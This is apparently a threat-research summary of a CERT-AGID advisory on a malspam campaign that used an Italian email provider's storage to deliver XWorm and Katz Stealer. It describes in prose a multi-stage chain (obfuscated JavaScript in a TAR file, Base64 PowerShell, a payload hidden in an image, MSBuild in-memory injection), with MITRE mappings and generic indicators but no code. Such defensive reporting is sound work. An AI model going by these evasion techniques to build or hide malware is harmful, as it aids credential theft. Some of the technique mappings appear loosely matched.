Threat Research

XWorm and Katz Stealer Distributed via Email Storage Space

Italy-Cert-agid
XWorm and Katz Stealer Distributed via Email Storage Space

CERT-AGID identified a malspam campaign targeting an Italian email provider’s storage space, delivering the malware XWorm and Katz Stealer through a complex multi-stage infection chain. The attack leveraged steganography within an image to hide payloads and employed PowerShell obfuscation along with MSBuild.exe for execution. #KatzStealer #XWorm #CERTAGID

Keypoints

  • CERT-AGID detected a malspam campaign exploiting storage space linked to an Italian email provider to distribute malware.
  • The initial payload is delivered via a TAR file containing a large obfuscated JavaScript file.
  • Obfuscated PowerShell scripts decode further Base64-encoded payloads hosted within the same mailbox storage.
  • The campaign uses an image steganographically encoded with the Katz Stealer malware payload.
  • Katz Stealer is malware-as-a-service designed to steal user credentials and was invoked by a PowerShell function named VAI.
  • A second payload, the XWorm malware, is delivered in Base64-encoded form and injected into memory using MSBuild.exe.
  • CERT-AGID coordinated with the email provider to remove malicious resources and released IoCs to accredited entities.

MITRE Techniques

  • [T1071] Application Layer Protocol – C2 communication performed by XWorm malware with its command and control server. (‘communicates with the C2 server indicated’)
  • [T1027] Obfuscated Files or Information – Use of Base64 obfuscation in PowerShell scripts to conceal payloads. (‘obfuscated PowerShell in Base64’)
  • [T1056] Input Capture – Katz Stealer’s primary function to steal user credentials. (‘its objective is to steal access credentials’)
  • [T1106] Execution through API – The XWorm payload is injected and executed in memory using MSBuild.exe. (‘executed using MSBuild.exe’)
  • [T1560] Archive Collected Data – Initial delivery via a TAR file containing malicious JavaScript. (‘a TAR file containing a JavaScript file’)
  • [T1001] Data Obfuscation – Payload encoded steganographically within an image file. (‘payload is sequentially encoded in the pixels of the image’)

Indicators of Compromise

  • [URL] Malicious download locations hosted on Italian email provider’s webmail storage – containing TAR file, steganographic image, and xwormdotnet.txt.
  • [File Name] Malicious files – xwormdotnet.txt (Base64-encoded XWorm payload), downloaded steganographic image (~2.6MB) containing Katz Stealer.
  • [Payload] Base64 and reversed Base64 encoded PowerShell scripts used for multi-stage payload delivery.

Read more: https://cert-agid.gov.it/news/xworm-e-katz-stealer-distribuiti-tramite-spazio-di-storage-di-posta-elettronica/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint